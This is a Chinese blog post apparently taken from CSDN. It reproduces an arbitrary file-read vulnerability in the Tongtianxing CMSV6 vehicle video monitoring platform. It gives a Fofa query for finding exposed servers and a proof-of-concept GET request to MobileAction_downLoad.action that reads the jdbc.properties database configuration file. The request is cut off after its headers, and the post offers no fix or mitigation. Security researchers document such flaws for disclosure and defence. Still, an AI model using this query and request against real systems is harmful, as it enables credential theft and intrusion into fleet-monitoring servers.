【漏洞复现】通天星CMSV6车载监控平台MobileAction文件读取漏洞

晚风不及你ღ

已于 2024-04-25 09:18:30 修改

阅读量70

点赞数

文章标签： web安全

于 2024-04-25 09:16:45 首次发布

本文链接：https://blog.csdn.net/qq_37113223/article/details/138175784

版权

150 篇文章 1 订阅

已下架不支持订阅

通天星CMSV6车载定位监控平台因MobileAction文件读取漏洞，可能遭受攻击者利用，导致服务器文件信息泄露。漏洞涉及3G/4G视频传输、云存储服务的定位、无线视频终端产品。Fofa-Query通过web.body="/808gps/"可搜索到相关平台。

摘要由CSDN通过智能技术生成

通天星CMSV6车载定位监控平台拥有以位置服务、无线3G/4G视频传输、云存储服务为核心的研发团队，专注于为定位、无线视频终端产品提供平台服务，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。

通天星CMSV6车载视频监控平台存在MobileAction文件读取漏洞，攻击者可以利用此漏洞获取服务器文件信息，造成敏感信息泄露等安全问题。

Fofa-Query: web.body="/808gps/"

1.通天星CMSV6车载视频监控平台。

2.漏洞POC：

GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host: {
  {Hostname}}
User-Agent: M

了解本专栏

关注

专栏目录

已下架不支持订阅